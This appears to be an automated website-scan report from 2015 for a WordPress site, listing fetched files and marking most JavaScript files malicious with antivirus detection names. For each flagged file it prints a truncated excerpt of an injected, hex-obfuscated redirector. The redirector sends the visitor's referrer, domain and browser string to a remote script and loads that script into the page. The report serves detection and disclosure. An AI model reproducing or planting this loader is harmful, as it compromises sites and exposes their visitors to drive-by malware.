Request | Server response | Status |
http://www.ilovemonologic.com/ | HTTP/1.1 200 OK Connection: close Date: Mon, 02 Mar 2015 08:17:08 GMT Accept-Ranges: bytes Server: Apache Vary: Accept-Encoding Content-Length: 124 Content-Type: text/html
| clean |
http://ilovemonologic.com/info/ | 200 OK Content-Length: 43006 Content-Type: text/html | clean |
http://ilovemonologic.com/info/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 1684 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement("div");f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b==="string"){return d(b)}else{if(typeof b==="object"){for(a in b){if(typeof b[a]==="string"){b[a]=d(b[a])}}}}return b}; var _0xa687=["\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x6D\x73\x69\x65","\x69\x6E\x64\x65\x78\x4F\x66","\x6F\x70\x65\x72\x61","\x77\x65\x
... 714 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ikarus
- Trojan.Script
- nProtect
- Dropped:Trojan.Agent.JS.DN
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_REDIR.FB
- Emsisoft
- Dropped:Trojan.Agent.JS.DN (B)
- Comodo
- TrojWare.JS.Redirector.OM
- TrendMicro
- JS_REDIR.FB
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- Microsoft
- Trojan:JS/Redirector.ID
- MicroWorld-eScan
- Dropped:Trojan.Agent.JS.DN
- Fortinet
- JS/Crypted.AG!tr.dldr
- PCTools
- Trojan.Malscript
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- ClamAV
- JS.Trojan.Agent-8
- F-Secure
- Dropped:Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- F-Prot
- JS/Redir.AO
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Dropped:Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Commtouch
- JS/Redir.AO
- Agnitum
- JS.Srcid.Gen
- ESET-NOD32
- JS/Agent.NEQ
- BitDefender
- Dropped:Trojan.Agent.JS.DN
|
http://ilovemonologic.com/info/wp-includes/js/jquery/jquery.js?ver=1.4.4 | 200 OK Content-Length: 79996 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(E,B){function ka(a,b,d){if(d===B&&a.nodeType===1){d=a.getAttribute("data-"+b);if(typeof d==="string"){try{d=d==="true"?true:d==="false"?false:d==="null"?null:!c.isNaN(d)?parseFloat(d):Ja.test(d)?c.parseJSON(d):d}catch(e){}c.data(a,b,d)}else d=B}return d}function U(){return false}function ca(){return true}function la(a,b,d){d[0].type=a;return c.event.handle.apply(b,d)}function Ka(a){var b,d,e,f,h,l,k,o,x,r,A,C=[];f=[];h=c.data(this,this.nodeType?"events":"__events__");if(typeof
... 3121 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ad-Aware
- Trojan.Agent.JS.DN
- Ikarus
- Trojan.Script
- Rising
- JS:Trojan.Script.JS.Redirector.f!1609362
- nProtect
- Trojan.Agent.JS.DN
- K7AntiVirus
- Exploit ( 04c556d81 )
- TrendMicro-HouseCall
- JS_REDIR.FB
- Emsisoft
- Trojan.Agent.JS.DN (B)
- Comodo
- TrojWare.JS.Redirector.OM
- CAT-QuickHeal
- JS/Redirector.ID
- K7GW
- Exploit ( 04c556d81 )
- TrendMicro
- JS_REDIR.FB
- Microsoft
- Trojan:JS/Redirector.ID
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- MicroWorld-eScan
- Trojan.Agent.JS.DN
- Fortinet
- JS/JSRedir.DO!tr
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- ClamAV
- JS.Trojan.Downloader-2
- F-Secure
- Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- F-Prot
- JS/Redir.AO
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Commtouch
- JS/Redir.AO
- Agnitum
- JS.Srcid.Gen
- BitDefender
- Trojan.Agent.JS.DN
|
http://ilovemonologic.com/info/wp-content/themes/reviewit/js/cufon-yui.js | 200 OK Content-Length: 19634 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&
... 3065 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ikarus
- Trojan.Script
- nProtect
- Trojan.Agent.JS.DN
- TrendMicro-HouseCall
- JS_REDIR.FB
- Emsisoft
- Trojan.Agent.JS.DN (B)
- Comodo
- TrojWare.JS.Redirector.OM
- TrendMicro
- JS_REDIR.FB
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- Microsoft
- Trojan:JS/Redirector.ID
- Fortinet
- JS/Crypt.CABZ!tr
- PCTools
- Trojan.Malscript
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- ClamAV
- JS.Trojan.Agent-8
- F-Secure
- Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Agnitum
- JS.Srcid.Gen
- ESET-NOD32
- JS/Agent.NEQ
- BitDefender
- Trojan.Agent.JS.DN
|
http://ilovemonologic.com/info/wp-content/themes/reviewit/lib/scripts/mediaplayer/jwplayer.js | 200 OK Content-Length: 96952 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var jwplayer=function(a){return jwplayer.constructor(a)};jwplayer.constructor=function(a){};var $jw=jwplayer;jwplayer.version="5.4.1530 (Licensed version)";(function(b){b.utils=function(){};b.utils.typeOf=function(d){var c=typeof d;if(c==="object"){if(d){if(d instanceof Array){c="array"}}else{c="null"}}return c};b.utils.extend=function(){var c=b.utils.extend["arguments"];if(c.length>1){for(var e=1;e<c.length;e++){for(var d in c[e]){c[0][d]=c[e][d]}}return c[0]}return null};b.utils.clone=fu
... 3052 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ad-Aware
- Trojan.Agent.JS.DN
- Ikarus
- Trojan.Script
- Rising
- JS:Trojan.Script.JS.Redirector.f!1609362
- nProtect
- Trojan.Agent.JS.DN
- K7AntiVirus
- Exploit ( 04c556d81 )
- TrendMicro-HouseCall
- JS_REDIR.FB
- Emsisoft
- Trojan.Agent.JS.DN (B)
- Comodo
- TrojWare.JS.Redirector.OM
- CAT-QuickHeal
- JS/Redirector.ID
- K7GW
- Exploit ( 04c556d81 )
- TrendMicro
- JS_REDIR.FB
- Microsoft
- Trojan:JS/Redirector.ID
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- MicroWorld-eScan
- Trojan.Agent.JS.DN
- Fortinet
- JS/JSRedir.DO!tr
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- ClamAV
- JS.Trojan.Downloader-2
- F-Secure
- Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Agnitum
- JS.Srcid.Gen
- ESET-NOD32
- JS/Agent.NEQ
- BitDefender
- Trojan.Agent.JS.DN
|
http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js | 200 OK Content-Length: 10220 Content-Type: text/javascript | clean |
http://ilovemonologic.com/info/wp-content/themes/reviewit/js/custom.js | 200 OK Content-Length: 6592 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function mainmenu(){ jQuery("#nav ul li a").removeAttr("title"); jQuery("#nav ul a").removeAttr("title"); jQuery("#nav ul li:first-child").addClass("nav-first"); jQuery("#nav ul li:last-child").addClass("nav-last"); jQuery("#nav ul ul ").css({display: "none"}); jQuery("#nav ul li").hover(function(){ jQuery(this).find('ul:first').css({visibility: "visible",display: "none"}).show(0); },function(){ jQuery(this).find('ul:first').css({visibility: "hidden"});
... 3339 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ad-Aware
- Trojan.Agent.JS.DN
- Ikarus
- Trojan.Script
- Rising
- JS:Trojan.Script.JS.Redirector.f!1609362
- nProtect
- Trojan.Agent.JS.DN
- K7AntiVirus
- Exploit ( 04c556d81 )
- TrendMicro-HouseCall
- JS_REDIR.FB
- Emsisoft
- Trojan.Agent.JS.DN (B)
- Comodo
- TrojWare.JS.Redirector.OM
- CAT-QuickHeal
- JS/Redirector.ID
- K7GW
- Exploit ( 04c556d81 )
- TrendMicro
- JS_REDIR.FB
- Microsoft
- Trojan:JS/Redirector.ID
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- MicroWorld-eScan
- Trojan.Agent.JS.DN
- Fortinet
- JS/JSRedir.DO!tr
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- ClamAV
- JS.Trojan.Downloader-2
- F-Secure
- Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- F-Prot
- JS/Redir.AO
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Commtouch
- JS/Redir.AO
- Agnitum
- JS.Srcid.Gen
- ESET-NOD32
- JS/Agent.NEQ
- BitDefender
- Trojan.Agent.JS.DN
|
http://ilovemonologic.com/info/wp-content/themes/reviewit/js/jquery.prettyPhoto.js | 200 OK Content-Length: 34339 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.prettyPhoto = {version: '3.0'}; $.fn.prettyPhoto = function(pp_settings) { pp_settings = jQuery.extend({ animation_speed: 'fast', slideshow: false, autoplay_slideshow: false, opacity: 0.80, show_title: true, allow_resize: true, default_width: 500, default_height: 344, counter_separator_label: '/', theme: 'facebook', hideflash: false, wmode: 'opaque', autopla
... 3718 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ad-Aware
- Trojan.Agent.JS.DN
- Ikarus
- Trojan.Script
- nProtect
- Trojan.Agent.JS.DN
- K7AntiVirus
- Exploit ( 04c556d81 )
- TrendMicro-HouseCall
- JS_REDIR.FB
- Emsisoft
- Trojan.Agent.JS.DN (B)
- Comodo
- TrojWare.JS.Redirector.OM
- CAT-QuickHeal
- JS/Redirector.ID
- K7GW
- Exploit ( 04c556d81 )
- TrendMicro
- JS_REDIR.FB
- Microsoft
- Trojan:JS/Redirector.ID
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- MicroWorld-eScan
- Trojan.Agent.JS.DN
- Fortinet
- JS/JSRedir.DO!tr
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- ClamAV
- JS.Trojan.Downloader-2
- F-Secure
- Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- F-Prot
- JS/Redir.AO
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Commtouch
- JS/Redir.AO
- Agnitum
- JS.Srcid.Gen
- BitDefender
- Trojan.Agent.JS.DN
|
http://ilovemonologic.com/info/wp-content/themes/reviewit/js/jquery.cookies.js | 200 OK Content-Length: 5622 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.cookie = function(name, value, options) { if (typeof value != 'undefined') { options = options || {}; if (value === null) { value = ''; options.expires = -1; } var expires = ''; if (options.expires && (typeof options.expires == 'number' || options.expires.toUTCString)) { var date; if (typeof options.expires == 'number') { date = new Da
... 2118 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ad-Aware
- Trojan.Agent.JS.DN
- Ikarus
- Trojan.Script
- Rising
- JS:Trojan.Script.JS.Redirector.f!1609362
- nProtect
- Trojan.Agent.JS.DN
- K7AntiVirus
- Exploit ( 04c556d81 )
- TrendMicro-HouseCall
- JS_REDIR.FB
- Emsisoft
- Trojan.Agent.JS.DN (B)
- Comodo
- TrojWare.JS.Redirector.OM
- CAT-QuickHeal
- JS/Redirector.ID
- K7GW
- Exploit ( 04c556d81 )
- TrendMicro
- JS_REDIR.FB
- Microsoft
- Trojan:JS/Redirector.ID
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- MicroWorld-eScan
- Trojan.Agent.JS.DN
- Fortinet
- JS/Crypted.AG!tr.dldr
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- ClamAV
- JS.Trojan.Agent-8
- F-Secure
- Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- F-Prot
- JS/Redir.AO
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Commtouch
- JS/Redir.AO
- Agnitum
- JS.Srcid.Gen
- BitDefender
- Trojan.Agent.JS.DN
|
http://ilovemonologic.com/info/wp-content/themes/reviewit/js/jquery.nivo.slider.js | 200 OK Content-Length: 16523 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.fn.nivoSlider = function(options) { var settings = $.extend({}, $.fn.nivoSlider.defaults, options); return this.each(function() { var vars = { currentSlide: 0, currentImage: '', totalSlides: 0, randAnim: '', running: false, paused: false, stop:false }; var slider = $(this); slider.data('nivo:vars', vars); slider.css('position','relative'); slider.addC
... 3420 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ad-Aware
- Trojan.Agent.JS.DN
- Ikarus
- Trojan.Script
- Rising
- JS:Trojan.Script.JS.Redirector.f!1609362
- nProtect
- Trojan.Agent.JS.DN
- K7AntiVirus
- Exploit ( 04c556d81 )
- TrendMicro-HouseCall
- JS_REDIR.FB
- Emsisoft
- Trojan.Agent.JS.DN (B)
- Comodo
- TrojWare.JS.Redirector.OM
- CAT-QuickHeal
- JS/Redirector.ID
- K7GW
- Exploit ( 04c556d81 )
- TrendMicro
- JS_REDIR.FB
- Microsoft
- Trojan:JS/Redirector.ID
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- MicroWorld-eScan
- Trojan.Agent.JS.DN
- Fortinet
- JS/JSRedir.DO!tr
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- ClamAV
- JS.Trojan.Downloader-2
- F-Secure
- Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- F-Prot
- JS/Redir.AO
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Commtouch
- JS/Redir.AO
- Agnitum
- JS.Srcid.Gen
- BitDefender
- Trojan.Agent.JS.DN
|
http://ilovemonologic.com/info/wp-includes/js/jquery/ui.core.js?ver=1.8.9 | 200 OK Content-Length: 5700 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(c,j){function k(a){return!c(a).parents().andSelf().filter(function(){return c.curCSS(this,"visibility")==="hidden"||c.expr.filters.hidden(this)}).length}c.ui=c.ui||{};if(!c.ui.version){c.extend(c.ui,{version:"1.8.9",keyCode:{ALT:18,BACKSPACE:8,CAPS_LOCK:20,COMMA:188,COMMAND:91,COMMAND_LEFT:91,COMMAND_RIGHT:93,CONTROL:17,DELETE:46,DOWN:40,END:35,ENTER:13,ESCAPE:27,HOME:36,INSERT:45,LEFT:37,MENU:93,NUMPAD_ADD:107,NUMPAD_DECIMAL:110,NUMPAD_DIVIDE:111,NUMPAD_ENTER:108,NUMPAD_MULTIPLY:106,<
... 3149 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ad-Aware
- Trojan.Agent.JS.DN
- Ikarus
- Trojan.Script
- Rising
- JS:Trojan.Script.JS.Redirector.f!1609362
- nProtect
- Trojan.Agent.JS.DN
- K7AntiVirus
- Exploit ( 04c556d81 )
- TrendMicro-HouseCall
- JS_REDIR.FB
- Emsisoft
- Trojan.Agent.JS.DN (B)
- Comodo
- TrojWare.JS.Redirector.OM
- CAT-QuickHeal
- JS/Redirector.ID
- K7GW
- Exploit ( 04c556d81 )
- TrendMicro
- JS_REDIR.FB
- Microsoft
- Trojan:JS/Redirector.ID
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- MicroWorld-eScan
- Trojan.Agent.JS.DN
- Fortinet
- JS/JSRedir.DO!tr
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- ClamAV
- JS.Trojan.Agent-8
- F-Secure
- Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- F-Prot
- JS/Redir.AO
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Commtouch
- JS/Redir.AO
- Agnitum
- JS.Srcid.Gen
- BitDefender
- Trojan.Agent.JS.DN
|
http://ilovemonologic.com/info/wp-includes/js/jquery/ui.widget.js?ver=1.8.9 | 200 OK Content-Length: 4649 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(b,j){if(b.cleanData){var k=b.cleanData;b.cleanData=function(a){for(var c=0,d;(d=a[c])!=null;c++)b(d).triggerHandler("remove");k(a)}}else{var l=b.fn.remove;b.fn.remove=function(a,c){return this.each(function(){if(!c)if(!a||b.filter(a,[this]).length)b("*",this).add([this]).each(function(){b(this).triggerHandler("remove")});return l.call(b(this),a,c)})}}b.widget=function(a,c,d){var e=a.split(".")[0],f;a=a.split(".")[1];f=e+"-"+a;if(!d){d=c;c=b.Widget}b.expr[":"][f]=function(h){return!!b.d
... 3536 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ad-Aware
- Trojan.Agent.JS.DN
- Ikarus
- Trojan.Script
- Rising
- JS:Trojan.Script.JS.Redirector.f!1609362
- nProtect
- Trojan.Agent.JS.DN
- K7AntiVirus
- Exploit ( 04c556d81 )
- TrendMicro-HouseCall
- JS_REDIR.FB
- Emsisoft
- Trojan.Agent.JS.DN (B)
- Comodo
- TrojWare.JS.Redirector.OM
- CAT-QuickHeal
- JS/Redirector.ID
- K7GW
- Exploit ( 04c556d81 )
- TrendMicro
- JS_REDIR.FB
- Microsoft
- Trojan:JS/Redirector.ID
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- MicroWorld-eScan
- Trojan.Agent.JS.DN
- Fortinet
- JS/JSRedir.DO!tr
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- ClamAV
- JS.Trojan.Agent-8
- F-Secure
- Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- F-Prot
- JS/Redir.AO
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Commtouch
- JS/Redir.AO
- Agnitum
- JS.Srcid.Gen
- BitDefender
- Trojan.Agent.JS.DN
|
http://ilovemonologic.com/info/wp-includes/js/jquery/ui.mouse.js?ver=1.8.9 | 200 OK Content-Length: 4108 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(c){c.widget("ui.mouse",{options:{cancel:":input,option",distance:1,delay:0},_mouseInit:function(){var a=this;this.element.bind("mousedown."+this.widgetName,function(b){return a._mouseDown(b)}).bind("click."+this.widgetName,function(b){if(true===c.data(b.target,a.widgetName+".preventClickEvent")){c.removeData(b.target,a.widgetName+".preventClickEvent");b.stopImmediatePropagation();return false}});this.started=false},_mouseDestroy:function(){this.element.unbind("."+this.widgetName)},_mou
... 2945 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ad-Aware
- Trojan.Agent.JS.DN
- Ikarus
- Trojan.Script
- Rising
- JS:Trojan.Script.JS.Redirector.f!1609362
- nProtect
- Trojan.Agent.JS.DN
- K7AntiVirus
- Exploit ( 04c556d81 )
- TrendMicro-HouseCall
- JS_REDIR.FB
- Emsisoft
- Trojan.Agent.JS.DN (B)
- Comodo
- TrojWare.JS.Redirector.OM
- CAT-QuickHeal
- JS/Redirector.ID
- K7GW
- Exploit ( 04c556d81 )
- TrendMicro
- JS_REDIR.FB
- Microsoft
- Trojan:JS/Redirector.ID
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- MicroWorld-eScan
- Trojan.Agent.JS.DN
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- ClamAV
- JS.Trojan.Agent-8
- F-Secure
- Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- F-Prot
- JS/Redir.AO
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Commtouch
- JS/Redir.AO
- Agnitum
- JS.Srcid.Gen
- BitDefender
- Trojan.Agent.JS.DN
|
